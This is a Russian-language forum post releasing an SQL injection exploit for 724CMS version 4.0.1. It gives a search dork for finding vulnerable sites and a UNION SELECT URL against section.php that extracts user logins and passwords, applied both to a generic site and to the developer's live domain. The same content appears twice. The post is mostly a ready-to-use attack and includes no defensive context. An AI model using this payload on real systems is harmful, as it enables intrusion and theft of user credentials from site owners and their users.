Ded MustD!e
08.09.2009, 22:31
Продукт: 724CMS
Версия: 4.0.1
Дорк: inurl:"section.php?Nav=Section"
Уязвимый скрипт: section.php
CMS платная, где слить сорцы не нашел.
Эксплойт:
http://site.com/section.php?Nav=Section&Lang=En&ID=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,us er_login,user_password),11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28+from+Users--
Пример на сайте разработчика:
http://724cms.ca/section.php?Nav=Section&Lang=En&ID=-18+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u ser_login,user_password),11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28+from+Users--
Вывод в тегах <title></title>
Версия: 4.0.1
Дорк: inurl:"section.php?Nav=Section"
Уязвимый скрипт: section.php
CMS платная, где слить сорцы не нашел.
Эксплойт:
http://site.com/section.php?Nav=Section&Lang=En&ID=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,us er_login,user_password),11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28+from+Users--
Пример на сайте разработчика:
http://724cms.ca/section.php?Nav=Section&Lang=En&ID=-18+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u ser_login,user_password),11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28+from+Users--
Вывод в тегах <title></title>